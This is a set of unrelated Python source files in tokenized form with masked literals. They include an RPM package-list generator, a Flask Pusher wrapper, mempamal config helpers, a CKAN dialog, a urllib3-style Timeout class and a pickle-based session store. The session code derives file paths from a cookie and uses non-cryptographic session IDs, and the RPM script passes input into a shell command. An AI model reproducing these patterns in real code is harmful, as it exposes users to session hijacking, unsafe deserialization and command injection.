<s> import os <EOL> import sys <EOL> import subprocess <EOL> import getopt <EOL> import re <EOL> import datetime <EOL> from socket import gethostname <EOL> def run_or_die ( command ) : <EOL> """<STR_LIT>""" <EOL> ( status , stdio ) = subprocess . getstatusoutput ( command ) <EOL> if status != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( command , status , stdio ) ) <EOL> return stdio <EOL> def rpmblob_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> ret = cmp ( a [ '<STR_LIT:name>' ] , b [ '<STR_LIT:name>' ] ) <EOL> if ret == <NUM_LIT:0> : <EOL> ret = verstr_cmp ( a [ '<STR_LIT:version>' ] , b [ '<STR_LIT:version>' ] ) <EOL> if ret == <NUM_LIT:0> : <EOL> ret = verstr_cmp ( a [ '<STR_LIT>' ] , b [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def verstr_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> ret = <NUM_LIT:0> <EOL> index = <NUM_LIT:0> <EOL> a_parts = subdivide ( a ) <EOL> b_parts = subdivide ( b ) <EOL> prerelease_pattern = re . compile ( '<STR_LIT>' ) <EOL> while ret == <NUM_LIT:0> and index < min ( len ( a_parts ) , len ( b_parts ) ) : <EOL> subindex = <NUM_LIT:0> <EOL> a_subparts = a_parts [ index ] <EOL> b_subparts = b_parts [ index ] <EOL> while ret == <NUM_LIT:0> and subindex < min ( len ( a_subparts ) , len ( b_subparts ) ) : <EOL> ret = cmp ( a_subparts [ subindex ] , b_subparts [ subindex ] ) <EOL> if ret != <NUM_LIT:0> : <EOL> return ret <EOL> subindex = subindex + <NUM_LIT:1> <EOL> if len ( a_subparts ) != len ( b_subparts ) : <EOL> if len ( a_subparts ) > len ( b_subparts ) and prerelease_pattern . match ( str ( a_subparts [ subindex ] ) ) : <EOL> return - <NUM_LIT:1> <EOL> elif len ( a_subparts ) < len ( b_subparts ) and prerelease_pattern . match ( str ( b_subparts [ subindex ] ) ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return len ( a_subparts ) - len ( b_subparts ) <EOL> index = index + <NUM_LIT:1> <EOL> if len ( a_parts ) != len ( b_parts ) : <EOL> if len ( a_parts ) > len ( b_parts ) and prerelease_pattern . match ( str ( a_parts [ index ] [ <NUM_LIT:0> ] ) ) : <EOL> return - <NUM_LIT:1> <EOL> elif len ( a_parts ) < len ( b_parts ) and prerelease_pattern . match ( str ( b_parts [ index ] [ <NUM_LIT:0> ] ) ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return len ( a_parts ) - len ( b_parts ) <EOL> return ret <EOL> def subdivide ( verstr ) : <EOL> """<STR_LIT>""" <EOL> parts = [ ] <EOL> major_parts = verstr . split ( '<STR_LIT:.>' ) <EOL> for major_part in major_parts : <EOL> minor_parts = [ ] <EOL> index = <NUM_LIT:0> <EOL> while index < len ( major_part ) : <EOL> if major_part [ index ] . isdigit ( ) : <EOL> digit_str_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and major_part [ index ] . isdigit ( ) : <EOL> digit_str_part = digit_str_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> digit_part = int ( digit_str_part ) <EOL> minor_parts . append ( digit_part ) <EOL> elif major_part [ index ] . isalpha ( ) : <EOL> alpha_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and major_part [ index ] . isalpha ( ) : <EOL> alpha_part = alpha_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> minor_parts . append ( alpha_part ) <EOL> elif not major_part [ index ] . isalnum ( ) : <EOL> other_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and not major_part [ index ] . isalnum ( ) : <EOL> other_part = other_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> minor_parts . append ( other_part ) <EOL> parts . append ( minor_parts ) <EOL> return parts <EOL> subarch_mapping = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> arch_mapping = { '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def parse_rpm ( path , filename ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' % ( path , filename ) <EOL> output = run_or_die ( cmd ) <EOL> ( name , version , release , subarch ) = output . split ( ) <EOL> if subarch not in list ( subarch_mapping . keys ( ) ) : <EOL> raise Exception ( "<STR_LIT>" % ( path , filename , subarch ) ) <EOL> return ( name , version , release , subarch ) <EOL> def parse_rpm_filename ( path , filename ) : <EOL> """<STR_LIT>""" <EOL> name , version , release , subarch = None , None , None , None <EOL> try : <EOL> ( major , minor ) = sys . version_info [ : <NUM_LIT:2> ] <EOL> if major >= <NUM_LIT:2> and minor >= <NUM_LIT:4> : <EOL> ( blob , subarch , extension ) = filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> ( name , version , release ) = blob . rsplit ( '<STR_LIT:->' , <NUM_LIT:2> ) <EOL> else : <EOL> ( rextension , rsubarch , rblob ) = filename [ : : - <NUM_LIT:1> ] . split ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> ( blob , subarch , extension ) = ( rblob [ : : - <NUM_LIT:1> ] , rsubarch [ : : - <NUM_LIT:1> ] , rextension [ : : - <NUM_LIT:1> ] ) <EOL> ( rrelease , rversion , rname ) = blob [ : : - <NUM_LIT:1> ] . split ( '<STR_LIT:->' , <NUM_LIT:2> ) <EOL> ( name , version , release ) = ( rname [ : : - <NUM_LIT:1> ] , rversion [ : : - <NUM_LIT:1> ] , rrelease [ : : - <NUM_LIT:1> ] ) <EOL> if subarch not in list ( subarch_mapping . keys ( ) ) : <EOL> raise "<STR_LIT>" % ( path , filename , subarch ) <EOL> except : <EOL> sys . stderr . write ( "<STR_LIT>" % ( path , filename ) ) <EOL> ( name , version , release , subarch ) = parse_rpm ( path , filename ) <EOL> return ( name , version , release , subarch ) <EOL> def get_pkgs ( rpmdir ) : <EOL> """<STR_LIT>""" <EOL> pkgs = { } <EOL> """<STR_LIT>""" <EOL> rpms = [ item for item in os . listdir ( rpmdir ) if item . endswith ( '<STR_LIT>' ) ] <EOL> for filename in rpms : <EOL> ( name , version , release , subarch ) = parse_rpm_filename ( rpmdir , filename ) <EOL> rpmblob = { '<STR_LIT:file>' : filename , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : release , <EOL> '<STR_LIT>' : subarch } <EOL> if name in pkgs : <EOL> pkgs [ name ] . append ( rpmblob ) <EOL> else : <EOL> pkgs [ name ] = [ rpmblob ] <EOL> return pkgs <EOL> def prune_pkgs_latest ( pkgs ) : <EOL> """<STR_LIT>""" <EOL> latest_pkgs = { } <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> ( major , minor ) = sys . version_info [ : <NUM_LIT:2> ] <EOL> if major >= <NUM_LIT:2> and minor >= <NUM_LIT:4> : <EOL> rpmblobs . sort ( rpmblob_cmp , reverse = True ) <EOL> else : <EOL> rpmblobs . sort ( rpmblob_cmp ) <EOL> rpmblobs . reverse ( ) <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> all_archs = [ blob for blob in rpmblobs if blob [ '<STR_LIT:version>' ] == rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] and <EOL> blob [ '<STR_LIT>' ] == rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ] <EOL> latest_pkgs [ pkg_name ] = all_archs <EOL> return latest_pkgs <EOL> def prune_pkgs_archs ( pkgs ) : <EOL> """<STR_LIT>""" <EOL> pruned_pkgs = { } <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> arch_sifter = { } <EOL> for challenger in rpmblobs : <EOL> arch = subarch_mapping [ challenger [ '<STR_LIT>' ] ] <EOL> incumbent = arch_sifter . get ( arch ) <EOL> if incumbent == None : <EOL> arch_sifter [ arch ] = challenger <EOL> else : <EOL> subarchs = arch_mapping [ arch ] <EOL> challenger_index = subarchs . index ( challenger [ '<STR_LIT>' ] ) <EOL> incumbent_index = subarchs . index ( incumbent [ '<STR_LIT>' ] ) <EOL> if challenger_index < incumbent_index : <EOL> arch_sifter [ arch ] = challenger <EOL> pruned_pkgs [ pkg_name ] = list ( arch_sifter . values ( ) ) <EOL> return pruned_pkgs <EOL> def get_date_from_desc ( date_desc ) : <EOL> """<STR_LIT>""" <EOL> stdio = run_or_die ( '<STR_LIT>' + date_desc + '<STR_LIT>' ) <EOL> ( year_str , month_str , day_str ) = stdio . split ( ) <EOL> year = int ( year_str ) <EOL> month = int ( month_str ) <EOL> day = int ( day_str ) <EOL> date_obj = datetime . date ( year , month , day ) <EOL> return date_obj <EOL> def get_mtime_date ( path ) : <EOL> """<STR_LIT>""" <EOL> return datetime . date . fromtimestamp ( os . stat ( path ) . st_mtime ) <EOL> def prune_pkgs_timely ( pkgs , start_date_desc = None , end_date_desc = None , rpmdir = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> start_date = None <EOL> if start_date_desc != None : <EOL> start_date = get_date_from_desc ( start_date_desc ) <EOL> end_date = None <EOL> if end_date_desc != None : <EOL> end_date = get_date_from_desc ( end_date_desc ) <EOL> if start_date == None and end_date == None : <EOL> return pkgs <EOL> if start_date != None : <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> timely_blobs = [ blob for blob in rpmblobs if start_date < get_mtime_date ( rpmdir + '<STR_LIT:/>' + blob [ '<STR_LIT:file>' ] ) ] <EOL> if len ( timely_blobs ) == <NUM_LIT:0> : <EOL> del pkgs [ pkg_name ] <EOL> else : <EOL> pkgs [ pkg_name ] = timely_blobs <EOL> if end_date != None : <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> timely_blobs = [ blob for blob in rpmblobs if get_mtime_date ( rpmdir + '<STR_LIT:/>' + blob [ '<STR_LIT:file>' ] ) <= end_date ] <EOL> if len ( timely_blobs ) == <NUM_LIT:0> : <EOL> del pkgs [ pkg_name ] <EOL> else : <EOL> pkgs [ pkg_name ] = timely_blobs <EOL> return pkgs <EOL> def sorted_values ( adict ) : <EOL> """<STR_LIT>""" <EOL> items = list ( adict . items ( ) ) <EOL> items . sort ( ) <EOL> return [ value for key , value in items ] <EOL> def scan_rpm_dir ( rpmdir , uri , group , priority = <NUM_LIT:0> , output = sys . stdout , start_date_desc = None , end_date_desc = None ) : <EOL> """<STR_LIT>""" <EOL> output . write ( '<STR_LIT>' % ( uri , priority ) ) <EOL> output . write ( '<STR_LIT>' % group ) <EOL> pkgs = prune_pkgs_archs ( prune_pkgs_latest ( prune_pkgs_timely ( get_pkgs ( rpmdir ) , start_date_desc , end_date_desc , rpmdir ) ) ) <EOL> for rpmblobs in sorted_values ( pkgs ) : <EOL> if len ( rpmblobs ) == <NUM_LIT:1> : <EOL> rpmblob = rpmblobs [ <NUM_LIT:0> ] <EOL> output . write ( '<STR_LIT>' % <EOL> ( rpmblob [ '<STR_LIT:name>' ] , rpmblob [ '<STR_LIT:file>' ] , rpmblob [ '<STR_LIT:version>' ] , rpmblob [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> rpmblob = rpmblobs [ <NUM_LIT:0> ] <EOL> subarchs = [ blob [ '<STR_LIT>' ] for blob in rpmblobs ] <EOL> subarchs . sort ( ) <EOL> multiarch_string = '<STR_LIT:U+0020>' . join ( subarchs ) <EOL> pattern_string = '<STR_LIT>' % '<STR_LIT:|>' . join ( subarchs ) <EOL> pattern = re . compile ( pattern_string ) <EOL> multiarch_file = pattern . sub ( '<STR_LIT>' , rpmblob [ '<STR_LIT:file>' ] ) <EOL> output . write ( '<STR_LIT>' % <EOL> ( rpmblob [ '<STR_LIT:name>' ] , multiarch_file , rpmblob [ '<STR_LIT:version>' ] , rpmblob [ '<STR_LIT>' ] , multiarch_string ) ) <EOL> output . write ( '<STR_LIT>' ) <EOL> output . write ( '<STR_LIT>' ) <EOL> def usage ( output = sys . stdout ) : <EOL> output . write ( "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> usage ( sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> group = "<STR_LIT>" <EOL> uri = "<STR_LIT>" + gethostname ( ) + "<STR_LIT>" <EOL> rpmdir = "<STR_LIT:.>" <EOL> priority = "<STR_LIT:0>" <EOL> output = None <EOL> for opt , arg in opts : <EOL> if opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> group = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> uri = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rpmdir = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> priority = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> output = arg <EOL> if output == None : <EOL> output = sys . stdout <EOL> else : <EOL> output = file ( output , "<STR_LIT:w>" ) <EOL> scan_rpm_dir ( rpmdir , uri , group , priority , output ) </s>
<s> from pusher import Pusher as BasePusher <EOL> class Pusher ( BasePusher ) : <EOL> def __init__ ( self , app = None , ** options ) : <EOL> if app is not None : <EOL> self . init_app ( app , ** options ) <EOL> def init_app ( self , app , ** options ) : <EOL> """<STR_LIT>""" <EOL> sd = options . setdefault <EOL> conf = app . config <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT:key>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' , True ) ) <EOL> sd ( '<STR_LIT:host>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT:port>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , ( conf . get ( '<STR_LIT>' ) <EOL> or app . json_encoder ) ) <EOL> sd ( '<STR_LIT>' , ( conf . get ( '<STR_LIT>' ) <EOL> or app . json_decoder ) ) <EOL> if conf . get ( '<STR_LIT>' ) : <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> super ( Pusher , self ) . __init__ ( ** options ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . extensions = { } <EOL> app . extensions [ '<STR_LIT>' ] = self </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os . path as path <EOL> import warnings <EOL> import sklearn . externals . joblib as joblib <EOL> from sklearn . pipeline import Pipeline <EOL> from mempamal . crossval import make_folds <EOL> def _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> for k in req_keys : <EOL> try : <EOL> cfg [ k ] <EOL> except KeyError : <EOL> raise KeyError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( cat , k ) ) <EOL> def _check_cv_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg [ "<STR_LIT>" ] , req_keys , cat = "<STR_LIT>" ) <EOL> if cfg [ "<STR_LIT>" ] : <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , [ "<STR_LIT>" ] , cat = "<STR_LIT>" ) <EOL> _check_conf ( cfg [ "<STR_LIT>" ] , req_keys , cat = "<STR_LIT>" ) <EOL> def _check_data_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT:data>" ) <EOL> def _check_method_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) <EOL> def check_conf ( cfg , cat = "<STR_LIT>" , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if cat == "<STR_LIT>" : <EOL> _check_cv_conf ( cfg ) <EOL> elif cat == "<STR_LIT>" : <EOL> _check_method_conf ( cfg ) <EOL> elif cat == "<STR_LIT:data>" : <EOL> _check_data_conf ( cfg ) <EOL> if verbose : <EOL> print ( cfg ) <EOL> def JSONify_estimator ( est , <EOL> model_selection = False , <EOL> param_val = None , <EOL> out = None , <EOL> path_to_mr = None , <EOL> mapper = "<STR_LIT>" , <EOL> i_red = "<STR_LIT>" , <EOL> o_red = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if path_to_mr is None : <EOL> import mempamal <EOL> path_to_mr = path . join ( path . dirname ( mempamal . __file__ ) , "<STR_LIT>" ) <EOL> steps = [ ] <EOL> if est . __class__ is Pipeline : <EOL> for n , s in est . steps : <EOL> t = [ repr ( s . __class__ ) . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] , s . get_params ( ) ] <EOL> steps . append ( [ n , t ] ) <EOL> else : <EOL> cl = repr ( est . __class__ ) . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] <EOL> n = cl . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> steps . append ( [ n , [ cl , est . get_params ( ) ] ] ) <EOL> conf = { } <EOL> conf [ "<STR_LIT>" ] = steps <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , mapper ) <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , i_red ) <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , o_red ) <EOL> check_conf ( conf , cat = "<STR_LIT>" ) <EOL> if out is not None : <EOL> conf [ "<STR_LIT:src>" ] = path . basename ( out ) <EOL> with open ( out , '<STR_LIT:w>' ) as fd : <EOL> json . dump ( conf , fd , indent = <NUM_LIT:2> ) <EOL> return conf <EOL> def JSONify_cv ( cv , score_func , <EOL> cv_kwargs = None , <EOL> score_func_kwargs = None , <EOL> inner_cv = None , <EOL> inner_cv_kwargs = None , <EOL> inner_score_func = None , <EOL> inner_score_func_kwargs = None , <EOL> stratified = False , <EOL> out = None ) : <EOL> """<STR_LIT>""" <EOL> conf = { } <EOL> cv_kwargs = ( { } if cv_kwargs is None else cv_kwargs ) <EOL> if ( inner_cv is not None ) and ( inner_score_func is None ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> modelSelection = False if inner_cv is None else True <EOL> cv_cl = "<STR_LIT:.>" . join ( [ cv . __module__ , cv . __name__ ] ) <EOL> sf = "<STR_LIT:.>" . join ( [ score_func . __module__ , score_func . __name__ ] ) <EOL> sf_kwargs = ( { } if score_func_kwargs is None <EOL> else score_func_kwargs ) <EOL> if modelSelection : <EOL> icv_cl = "<STR_LIT:.>" . join ( [ inner_cv . __module__ , inner_cv . __name__ ] ) <EOL> icv_kwargs = ( { } if inner_cv_kwargs is None else inner_cv_kwargs ) <EOL> isf = "<STR_LIT:.>" . join ( [ inner_score_func . __module__ , <EOL> inner_score_func . __name__ ] ) <EOL> isf_kwargs = ( { } if inner_score_func_kwargs is None <EOL> else inner_score_func_kwargs ) <EOL> conf [ "<STR_LIT>" ] = modelSelection <EOL> conf [ "<STR_LIT>" ] = stratified <EOL> conf [ "<STR_LIT>" ] = { } <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ cv_cl , cv_kwargs ] <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ sf , sf_kwargs ] <EOL> if modelSelection : <EOL> conf [ "<STR_LIT>" ] = { } <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ icv_cl , icv_kwargs ] <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ isf , isf_kwargs ] <EOL> check_conf ( conf , cat = "<STR_LIT>" ) <EOL> if out is not None : <EOL> conf [ "<STR_LIT:src>" ] = path . basename ( out ) <EOL> with open ( out , '<STR_LIT:w>' ) as fd : <EOL> json . dump ( conf , fd , indent = <NUM_LIT:2> ) <EOL> return conf <EOL> def build_dataset ( X , y , method_conf , cv_conf , <EOL> outputdir = "<STR_LIT:.>" , <EOL> grid = None , <EOL> verbose = False , <EOL> compress = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> n_targets = <NUM_LIT:1> if ( y . ndim == <NUM_LIT:1> ) else y . shape [ <NUM_LIT:1> ] <EOL> if n_targets > <NUM_LIT:1> : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , RuntimeWarning ) <EOL> output_file = path . join ( outputdir , "<STR_LIT>" ) <EOL> folds = dict ( make_folds ( y , cv_conf , verbose = verbose ) , <EOL> src = path . basename ( output_file ) ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" . format ( output_file ) ) <EOL> dataset = { "<STR_LIT:X>" : X , "<STR_LIT:Y>" : y , <EOL> "<STR_LIT>" : n_samples , "<STR_LIT>" : n_targets , <EOL> "<STR_LIT>" : folds , "<STR_LIT>" : grid } <EOL> joblib . dump ( dataset , output_file , compress = compress ) <EOL> return dataset </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from PyQt4 import QtGui , uic <EOL> from util import Util <EOL> FORM_CLASS , _ = uic . loadUiType ( os . path . join ( <EOL> os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> class CKANBrowserDialogDisclaimer ( QtGui . QDialog , FORM_CLASS ) : <EOL> def __init__ ( self , settings , parent = None ) : <EOL> """<STR_LIT>""" <EOL> super ( CKANBrowserDialogDisclaimer , self ) . __init__ ( parent ) <EOL> self . setModal ( True ) <EOL> self . setupUi ( self ) <EOL> self . main_win = parent <EOL> self . settings = settings <EOL> self . util = Util ( self . settings , self . main_win ) <EOL> logo_path = self . util . resolve ( u'<STR_LIT>' ) <EOL> self . IDC_lblLogo . setPixmap ( QtGui . QPixmap ( logo_path ) ) <EOL> self . IDC_brInfo . setOpenExternalLinks ( True ) <EOL> self . IDC_brInfo . setHtml ( self . util . tr ( '<STR_LIT>' ) ) </s>
<s> _debug = <NUM_LIT:0> <EOL> eDetecting = <NUM_LIT:0> <EOL> eFoundIt = <NUM_LIT:1> <EOL> eNotMe = <NUM_LIT:2> <EOL> eStart = <NUM_LIT:0> <EOL> eError = <NUM_LIT:1> <EOL> eItsMe = <NUM_LIT:2> <EOL> SHORTCUT_THRESHOLD = <NUM_LIT> </s>
<s> from socket import _GLOBAL_DEFAULT_TIMEOUT <EOL> import time <EOL> from . . exceptions import TimeoutStateError <EOL> _Default = object ( ) <EOL> def current_time ( ) : <EOL> """<STR_LIT>""" <EOL> return time . time ( ) <EOL> class Timeout ( object ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT_TIMEOUT = _GLOBAL_DEFAULT_TIMEOUT <EOL> def __init__ ( self , total = None , connect = _Default , read = _Default ) : <EOL> self . _connect = self . _validate_timeout ( connect , '<STR_LIT>' ) <EOL> self . _read = self . _validate_timeout ( read , '<STR_LIT>' ) <EOL> self . total = self . _validate_timeout ( total , '<STR_LIT>' ) <EOL> self . _start_connect = None <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> type ( self ) . __name__ , self . _connect , self . _read , self . total ) <EOL> @ classmethod <EOL> def _validate_timeout ( cls , value , name ) : <EOL> """<STR_LIT>""" <EOL> if value is _Default : <EOL> return cls . DEFAULT_TIMEOUT <EOL> if value is None or value is cls . DEFAULT_TIMEOUT : <EOL> return value <EOL> try : <EOL> float ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> try : <EOL> if value < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> except TypeError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> return value <EOL> @ classmethod <EOL> def from_float ( cls , timeout ) : <EOL> """<STR_LIT>""" <EOL> return Timeout ( read = timeout , connect = timeout ) <EOL> def clone ( self ) : <EOL> """<STR_LIT>""" <EOL> return Timeout ( connect = self . _connect , read = self . _read , <EOL> total = self . total ) <EOL> def start_connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _start_connect is not None : <EOL> raise TimeoutStateError ( "<STR_LIT>" ) <EOL> self . _start_connect = current_time ( ) <EOL> return self . _start_connect <EOL> def get_connect_duration ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _start_connect is None : <EOL> raise TimeoutStateError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return current_time ( ) - self . _start_connect <EOL> @ property <EOL> def connect_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . total is None : <EOL> return self . _connect <EOL> if self . _connect is None or self . _connect is self . DEFAULT_TIMEOUT : <EOL> return self . total <EOL> return min ( self . _connect , self . total ) <EOL> @ property <EOL> def read_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( self . total is not None and <EOL> self . total is not self . DEFAULT_TIMEOUT and <EOL> self . _read is not None and <EOL> self . _read is not self . DEFAULT_TIMEOUT ) : <EOL> if self . _start_connect is None : <EOL> return self . _read <EOL> return max ( <NUM_LIT:0> , min ( self . total - self . get_connect_duration ( ) , <EOL> self . _read ) ) <EOL> elif self . total is not None and self . total is not self . DEFAULT_TIMEOUT : <EOL> return max ( <NUM_LIT:0> , self . total - self . get_connect_duration ( ) ) <EOL> else : <EOL> return self . _read </s>
<s> __author__ = '<STR_LIT>' <EOL> import random <EOL> import pickle <EOL> import os <EOL> from server . handlers import cookieHandler <EOL> import config <EOL> def get ( self , key ) : <EOL> return readSession ( self ) [ key ] <EOL> def set ( self , key , value ) : <EOL> _SESSION_ = readSession ( self ) <EOL> _SESSION_ [ key ] = value <EOL> commitSession ( self , _SESSION_ ) <EOL> def delete_all_sessions ( ) : <EOL> folder = config . __SESSIONS_DIR__ + "<STR_LIT:/>" <EOL> for the_file in os . listdir ( folder ) : <EOL> file_path = os . path . join ( folder , the_file ) <EOL> try : <EOL> if os . path . isfile ( file_path ) : <EOL> os . unlink ( file_path ) <EOL> except Exception as e : <EOL> print ( e ) <EOL> def delete_session ( key ) : <EOL> folder = config . __SESSIONS_DIR__ + "<STR_LIT:/>" <EOL> file_path = os . path . join ( folder , str ( key ) + '<STR_LIT>' ) <EOL> try : <EOL> if os . path . isfile ( file_path ) : <EOL> os . unlink ( file_path ) <EOL> except Exception as e : <EOL> print ( e ) <EOL> def newSession ( self ) : <EOL> return startSession ( self , True ) <EOL> def startSession ( self , forceStart = False ) : <EOL> session = readSessionKey ( self ) <EOL> if len ( str ( session ) ) < <NUM_LIT:10> or forceStart : <EOL> hash = random . getrandbits ( <NUM_LIT> ) <EOL> __SESSION__ = { } <EOL> save_obj ( __SESSION__ , hash ) <EOL> key = hash <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> else : <EOL> key = readSessionKey ( self ) <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> __SESSION__ = readSession ( self , key ) <EOL> return key <EOL> def commitSession ( self , __SESSION__ , key = None ) : <EOL> if key == None : <EOL> key = readSessionKey ( self ) <EOL> save_obj ( __SESSION__ , key ) <EOL> return <EOL> def readSessionKey ( self ) : <EOL> session = cookieHandler . ReadCookie ( self , config . __SESSION_COOKIE_NAME__ ) <EOL> return session <EOL> def readSession ( self , key = None ) : <EOL> if key == None : <EOL> key = readSessionKey ( self ) <EOL> __SESSION__ = { } <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> return __SESSION__2 <EOL> def save_obj ( obj , name ) : <EOL> with open ( config . __SESSIONS_DIR__ + "<STR_LIT:/>" + str ( name ) + '<STR_LIT>' , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( obj , f , pickle . HIGHEST_PROTOCOL ) 